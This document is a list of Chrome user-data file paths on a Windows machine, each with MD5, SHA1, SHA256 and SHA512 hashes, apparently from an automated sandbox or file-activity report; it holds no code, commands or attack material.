C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\341a00711fd7a2f8_0
| MD5 | 8e3b62500bafc89d1b68758552490f2b |
| SHA1 | 12455ddd84442730d13fb0a6a748d015e0d72785 |
| SHA256 | 4811d4ddf205bbbf8846d985da5869734a8199749f1033ed86a37127be6822f0 |
| SHA512 | 6a8426967541ffefe93b568940e905f6ff32fe0459cb607406b5377e089b717c4d300e07c71a11b9bad798bdb196e6a5fbbb5bc967474c8742785a8918f0c45d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\2bfde39962961371_0
| MD5 | 538d9002053c3901dd44e989d4af0c0f |
| SHA1 | 5d427a01fc90854e06bddc4700e1709a489bf032 |
| SHA256 | 8a43ce133b92dc992eb758fa7946c28b652afb17a2ceafbe455d718fa162dd5b |
| SHA512 | 65a4f6e4dece8fd8b512ee3be17ad979e5d3ce650e450641f53a74734f8d1b66189324a4b578f404417b162d3aa1a798f19499e22f947f3bb39209f8ebd6f826 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\40d588b5cf114cc9_0
| MD5 | 652e30b15bc127f74ec7694c60e0e54d |
| SHA1 | 1a1d78c9cd807b45ec9386bc3d32b11ff6d81050 |
| SHA256 | 54bd111bd66f8f7679e41c2664e99234a83c3a314373c09d64121bac29950f2a |
| SHA512 | a72a4ed03f0ac878cbd651c36fc64755ea6476234a30dad83fec7ccc5e02d7141f032a34dcfcce378f13f7ea06871f4b926adfb17495e1d56528f64470e05bc5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c881247545e3f99b0d398e25c8573125 |
| SHA1 | ea30d6ecd4466500cd646773e5891d912f3d9ece |
| SHA256 | 8876391b7b3773ea24d73ae4d8c335f6e3446176a95aee94e6eefc165950548e |
| SHA512 | b5ce77a08a27295ce513e9ce8d134423e6998b40890cd25173f416683096d3dac0107082fe15c248af51f14fe32df2c5dc1cf356a894ab2282adc7fb2151549e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0688b2df2cfe9c215562579a2807ccdb |
| SHA1 | 70457f292ac52a18bb2cd44795822fd79f38b95a |
| SHA256 | b9f33e6049fb48909ab06cc319885f0e71f50c0f1b504ed4e4eca11e50710260 |
| SHA512 | 200eef716b10decee6b7babd6c92c694dbb922c9477c3f1043e77ac86f3c4cc58d9f3cb81007e8e3c7ec0f16512708ff1cc516b4e5cb8c04a7a6e1401b061edb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5348f317c40d6b6082e17984fea6b149 |
| SHA1 | f1f6fac8622e7aa30f6bc16414214bffd17dc33b |
| SHA256 | 2f3c3addab489eab3e5c03b6029c548a99fce6869b0ea1d8cc8ab4dc39d385a6 |
| SHA512 | 3e9e3606cf9f497036788c00fce744dc6ef28e5b5ae4002e0b94a7377f2f88ce9eeb9e6312d1a8d5c119b8d25ae3e91bc166731fc3719fe05c6e30e88147f651 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | faaf15647454a723f51e244b6422a5d6 |
| SHA1 | 6dd37e4dc3fbaec5c85577e96e5841d6a4dde5aa |
| SHA256 | eca1b3dd4db6a0811b346ac3a4774dd086fdc1b0c9a4f459b6f22e9ffa58b3fb |
| SHA512 | 6222362f98f7f04c3a43205b7bbfa8f683fb6524e269d512ccb54c1d77dcb177a8916850413570a89e02737b1029db25c39ad0df2639512a6e5cb30e40857404 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 76d87eee3922280fdd62f329c2a63cc5 |
| SHA1 | 80e3bf09b7c5778f2ec56897c34235af6d6a2f59 |
| SHA256 | 1e67e08c50095224a10a3e942b897bcb478f104e23bf867efa137953f5606b85 |
| SHA512 | 0b364236fa71918f737163fc255c53197891f5a02bb94a2803882eaed7516ab2ee67a984a7cc9989ee5cfbfc6fc368f8664ab4e1830a7055c7a9d84b6534f81e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e5fbb20bbb7d4d719d08bef3126479b1 |
| SHA1 | 65ac8419203978f040966a781eed4b4b3f397cb9 |
| SHA256 | 4396c6a1ff3378997b7fc9f0bdf14f07cbc3d710f9a4b56f8316c5204248591a |
| SHA512 | 4f1c925b2ad0a04fba425633f16a54fc02ad39f14fea806716965cd9267b88337344b332e7376f2eb2f365bff9f82590e0261ee87f9a3eccb305569c7af982da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ac5a648fe916ae389ce0f1d8f6f6190b |
| SHA1 | b74964ec0ce9285382dd1273a4753552d2b58034 |
| SHA256 | 0423a398aea9ecbe09531a4974322ad282a2566d858fbc5726c901a906e8f288 |
| SHA512 | faadc71e7be7fde23a8b4a36a8dae19be82a0ac2f53ca321eff27b753b9563d0ec14f25d8358d4c21a47ba2973c0c868a3b99de4e2738ce575a8154a4b9018ab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | caa99a87733d97a1cfb41aa0e3378b57 |
| SHA1 | 9c99797c4f1f06fefad45b864f004b312a2424e1 |
| SHA256 | a1a872dd1be8fd4486a5f09879543c363c025216c1d18b72a2906901aef8082c |
| SHA512 | a0fc664e714336f79aca15ed13003c3538be3d512bcc235a1417ac6c1eafa6c001a3139e9ac9d46700546d4e6b19b3319c86efe4cc787fd79a99438d5547301e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 53f896e6ec3a1c85c0d9124da3b7380e |
| SHA1 | f4b222bb0b3fda0f2ab34768d1d086bc6533575e |
| SHA256 | 17445b99fe65252ca0a67cde3f5d2b1feb0224d39f52d1641ae0bb8dd0282453 |
| SHA512 | 512cd2d07e1e7ebe78ddf8f5c5a682a30a0a9a1f55099a466ddd54c351295a92f4ac4946ebf4218d6353a3148ac38a2dbc07c9f96e12042868acce13c9edb1c3 |